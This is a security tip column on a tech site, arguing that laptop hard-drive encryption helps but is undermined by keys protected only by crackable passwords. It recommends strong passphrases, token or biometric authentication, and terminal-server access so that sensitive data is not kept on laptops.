Laptop crypto: Do it, but realize it's not a panacea

There's more than one way to receive Threat Monitor Listen to this laptop crypto tip on your computer or MP3 player.

It's gotten so bad that the stories blur together. Five million credit cards on a stolen laptop here, ten million accounts compromised there, followed by over twenty million health-related records on a pilfered machine somewhere else. This depressing deluge is almost certain to lead to enterprise policies regarding laptop encryption and possibly even government regulations for encrypting specific kinds of data. That's good news, right?

Sure, but will laptop hard drive crypto solve the problem of theft? While laptop crypto is nice to have (and will very likely become a requirement for most of us soon), it won't solve the problem entirely. In fact, it might make some things worse.

Imagine a world where pretty much every organization has cobbled together a laptop crypto implementation to comply either with its own policies or government requirements. Company X loses a laptop storing 20 million accounts with very sensitive personally identifiable data. Management chooses not to disclose the fact that the laptop was stolen, because, after all, the data should be encrypted. The crypto should protect the data from the hands of the bad guys. Why bother incurring the wrath of customers and regulators? Some organizations won't disclose to the public or regulators that the data was exposed, because they believe that it wasn't.

Now, here's the rub. For nearly all modern crypto solutions, you are only as safe as the crypto keys. But, with the vast majority of desktop and laptop crypto systems, the keys are stored on the local system, protected by the user's password or passphrase. And, for those solutions seamlessly integrated with the operating system, like Microsoft's Encrypting File System (EFS), the user's operating system account password is typically the sole protection of the crypto key. For determined attackers, getting the sensitive data is only as hard as cracking the user's password, and then using that password to recover the crypto key. Once attackers have the password and the key, they can slice through to the sensitive data. Sadly, such an attack is far too easy, especially if weak password solutions are still in place, such as the still widespread Microsoft LANMAN password representation, a techno relic from ancient times that plagues many organizations today. With LANMAN passwords (included by default in most versions of Windows), an attacker can crack most passwords in less than a day.

And, making matters worse, if users aren't trained in using the crypto solution, they may inadvertently bypass it, leaving the data exposed even though the organization thinks the data safe.

As a result, laptop crypto may drive less disclosure of information theft, while still allowing the determined bad guys access to sensitive information. The data is still exposed, but we might find out about it a lot less.

So, is laptop crypto therefore useless? No, it still provides value against the half-witted attacker or petty laptop thief who isn't interested in password cracking or other techniques, keeping the sensitive data from them. But, for a determined, focused attacker, the password will often fail, the crypto key will be exposed, and the data will be stolen.

How can your enterprise deal with this concern? A multi-pronged approach is best. First, in conjunction with the deployment of desktop crypto, you must encourage your users to choose complex passwords, those that cannot be easily guessed or cracked. Educate your users with good awareness programs so that they choose reasonable passwords with a mix of alpha, numeric and special characters. Automated password complexity enforcement tools, such as the Anixis Password Policy Enforcer, can help prevent your users from choosing poor passwords. Going further, set your minimum password length to at least 15 -- or even 20 -- characters to boost your password strength. Now, you might be thinking, "There'd be riots in the cubicles if we made such a change!" But, with your awareness program, work on transitioning your users from the mindset of passwords to passphrases. The latter are easier to remember, easier to type and far less likely to be cracked.

Next, consider augmenting your authentication process with tokens or biometrics in addition to passwords. Some new laptops have fingerprint readers built right in. Card- and USB-based authentication tokens are becoming less expensive and are more likely to be carried in a user's wallet or on a key chain, making them less likely to be stolen with the corresponding laptop.

Finally, some particularly careful organizations are prohibiting users from downloading vast amounts of vital data to hard drives. Instead, these users rely on terminal services (like Microsoft Terminal Server or Citrix) to access the data stored on a central repository through a carefully guarded server. The laptop is merely a terminal for viewing data stored elsewhere. The terminal services are carried over a rock-solid, encrypted VPN. Of course, such solutions must be configured to shut off file transfer from the server back to the client, or users will bypass any prohibitions against file storage on the laptop either inadvertently or on purpose. But, with such a solution, if a laptop is stolen, it won't have any of the sensitive data on it, helping management and IT sleep a little easier at night.

About the author
Ed Skoudis is a founder and senior security consultant with Intelguardians, a Washington, DC-based information security consulting firm. His expertise includes hacker attacks and defenses, the information security industry and computer privacy issues. In addition to Counter Hack Reloaded, Ed is also the author of Malware: Fighting Malicious Code. He was also awarded 2004, 2005 and 2006 Microsoft MVP awards for Windows Server Security, and is an alumnus of the Honeynet Project. As an expert on SearchSecurity, Ed answers your questions relating to threats.

Rate this Tip To rate tips, you must be a member of SearchMobileComputing.com. Register now to start rating these tips. Log in if you are already a member. Digg This!     StumbleUpon     Del.icio.us    RELATED CONTENT Mobile Security Mobile security threats Two-factor authentication: Mobile security at your fingertips Securing your Windows Mobile devices In-the-cloud defenses for mobile malware On-device defenses for mobile malware Is malware coming to a smartphone near you? Protecting data on your BlackBerry Defining your mobile security policy Government regulations and mobile security policies Symbian: Protect your data, not just your device Mobile Authentication and Encryption Sybase offers enterprise-ready iPhone solution on the App Store Two-factor authentication: Mobile security at your fingertips RIM makes hostile takeover bid for encryption vendor Certicom In-the-cloud defenses for mobile malware Podcast: The truth about network security and mobile device access iPhone encryption is a must for the security-conscious enterprise Sybase iAnywhere launches productivity suite that tunnels critical business apps through email Mobile voice encryption gets cheaper, easier to do Avoiding data breaches through mobile encryption Mobile device security: Improving mobile authentication Mobile Authentication and Encryption Research Notebooks and Laptops Nokia to enter the netbook market Can the smartphone replace the laptop? Dell Latitude D430 with U7700: Laptop review by user Lenovo ThinkPad X200 laptop review Laptop technology fundamentals guide HP Voodoo Envy 133 business ultraportable debuts HP, Dell lead laptop sales for Q1 2008 Laptop review: Dell XPS M1530 user opinions Lenovo laptops keep score at the NBA Finals Laptop review: Lenovo ThinkPad T61 user opinions Notebooks and Laptops Research RELATED GLOSSARY TERMS Terms from Whatis.com − the technology online dictionary CCMP  (SearchMobileComputing.com) drive-by spamming  (SearchMobileComputing.com) LEAP (Lightweight Extensible Authentication Protocol)  (SearchMobileComputing.com) Open System Authentication (OSA)  (SearchMobileComputing.com) SIM card  (SearchMobileComputing.com) RELATED RESOURCES 2020software.com, trial software downloads for accounting software, ERP software, CRM software and business software systems Search Bitpipe.com for the latest white papers and business webcasts Whatis.com, the online computer dictionary DISCLAIMER: Our Tips Exchange is a forum for you to share technical advice and expertise with your peers and to learn from other enterprise IT professionals. TechTarget provides the infrastructure to facilitate this sharing of information. However, we cannot guarantee the accuracy or validity of the material submitted. You agree that your use of the Ask The Expert services and your reliance on any questions, answers, information or other materials received through this Web site is at your own risk.